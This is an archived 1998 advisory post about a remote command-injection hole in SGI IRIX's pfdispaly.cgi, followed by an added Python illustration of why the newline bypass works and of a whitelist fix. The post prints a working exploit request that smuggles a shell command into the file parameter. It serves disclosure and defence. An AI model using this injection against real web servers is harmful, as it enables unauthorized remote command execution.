Summary: As has been demonstrated many times, SGI CANNOT write secure CGI scripts. Nor can they write secure setuid programs. They fixed the last pfdispaly.cgi hole, but the new version is still quite buggy -- as this post demonstrates.
Author: "J.A. Gutierrez" <spd@GTC1.CPS.UNIZAR.ES>
Compromise: run arbitrary commands remotely as the UID running the webserver
Vulnerable Systems: SGI IRIX 6.2 using the performer_tools CGIs.
Date: 7 April 1998
Notes: I honestly believe default SGI security is as bad as default Windows NT security. That is sad.
Date: Tue, 7 Apr 1998 03:16:01 +0200
From: "J.A. Gutierrez" <spd@GTC1.CPS.UNIZAR.ES>
Subject: performer_tools again
There is already a patch from SGI to the pfdispaly.cgi
But it seems it fixes only that problem, without checking
the rest of the code for similar vulnerabilities, so even
after patch 3018 (04/01/98) you can try:
$ lynx -dump http://victim/cgi-bin/pfdispaly.cgi?'%0A/bin/uname%20-a|'
uname -a\| file
IRIX victim 6.2 03131015 IP22
$ lynx -dump \
(You probably will notice this exploit is similar to that
one on 'wrap'; it's nice to find that sometimes reusing
code does work)
The fix is easy (for this particular problem); so it's left
to the reader.
Anyway, if you're using SGI cgi's you should consider
limiting the access to your domain...
J.A. Gutierrez (finger me for PGP)
"So be easy and free / when you're drinking with me / I'm a man you don't meet every day" (The Pogues)
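The post's URL ends in `%0A/bin/uname%20-a|`: a newline, a command, and a trailing pipe. The following is an added illustration, not code from the original post, from SGI or from Fyodor, of why that shape works against a line-oriented regex filter and what Perl's two-argument open() (the sink a trailing `|` is aimed at) does with it; the filter functions are hypothetical stand-ins, since the real pfdispaly.cgi code is not on the page, and Python is used here as a portable stand-in for the Perl CGI. It also shows the whitelist-plus-confined-path check that the post leaves to the reader.

```python
"""Added illustration, not code from the original post, from SGI or from
Fyodor: why a leading %0A (newline) slips past a line-oriented regex
filter, what Perl's two-argument open() does with a trailing '|', and
what a whitelist plus a confined path lookup looks like instead. The
filter shapes are hypothetical; the real pfdispaly.cgi is not shown."""
import os
import re
from urllib.parse import unquote

# Constructed inputs: a benign request and the query string from the post.
BENIGN_QUERY = "demo.pf"
ATTACK_QUERY = "%0A/bin/uname%20-a|"


def decode_query(raw: str) -> str:
    """Percent-decode the way a CGI library would: %0A -> newline, %20 -> space."""
    return unquote(raw)


def blacklist_check(name: str) -> bool:
    """Hypothetical 'patched' filter: reject names carrying shell
    metacharacters, written as a start-anchored pattern that walks the
    name with '.'. '.' never matches a newline and '^' only anchors at
    offset 0 (no re.M), so a name that starts with a newline hides
    everything after it. Returns True when the name is accepted."""
    return re.match(r"^.*[|;&`$]", name) is None


def dollar_anchored_check(name: str) -> bool:
    """A second common mistake: a whitelist anchored with '$'. In Python
    (and Perl) '$' also matches just before a trailing newline, so
    'demo.pf\\n' is accepted although the alphabet has no newline."""
    return re.match(r"^[A-Za-z0-9_.-]+$", name) is not None


def whitelist_check(name: str) -> bool:
    """Whitelist a plain basename: fixed alphabet, whole string
    (re.fullmatch, equivalent to \\A...\\Z), and no '..' component."""
    return re.fullmatch(r"[A-Za-z0-9_.-]+", name) is not None and ".." not in name


def perl_open_target(name: str) -> str:
    """Mirror the rule Perl's two-argument open() applies to a filename,
    without executing anything: surrounding whitespace (the leading
    newline included) is stripped, a trailing '|' makes the rest a
    command whose output is read, a leading '|' a command to write to."""
    stripped = name.strip()
    if stripped.endswith("|"):
        return "pipe-from-command: " + stripped[:-1].strip()
    if stripped.startswith("|"):
        return "pipe-to-command: " + stripped[1:].strip()
    return "file: " + stripped


def safe_open_path(name: str, base_dir: str) -> str:
    """The fix as this example would do it: whitelist the name, resolve it
    under base_dir, refuse anything that resolves outside. Returns the
    resolved path and raises ValueError on bad input without touching the
    filesystem. Open the result with a real file open, never a shell or
    a two-argument open()."""
    if not whitelist_check(name):
        raise ValueError("name rejected by whitelist")
    base = os.path.realpath(base_dir)
    path = os.path.realpath(os.path.join(base, name))
    if os.path.commonpath([base, path]) != base:
        raise ValueError("name escapes base directory")
    return path


if __name__ == "__main__":
    for raw in (BENIGN_QUERY, ATTACK_QUERY):
        name = decode_query(raw)
        print(repr(name), "blacklist accepts:", blacklist_check(name),
              "whitelist accepts:", whitelist_check(name),
              "open() would do:", perl_open_target(name))
```

Run as a script it prints both requests side by side: the attack string is accepted by the blacklist and handed to open() as a command, while the whitelist rejects it. The point the post makes about patching one hole at a time is visible in `blacklist_check`: each metacharacter added to the class leaves the newline bypass in place, whereas the whole-string whitelist closes the class of bug.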
This page is part of Fyodor's exploit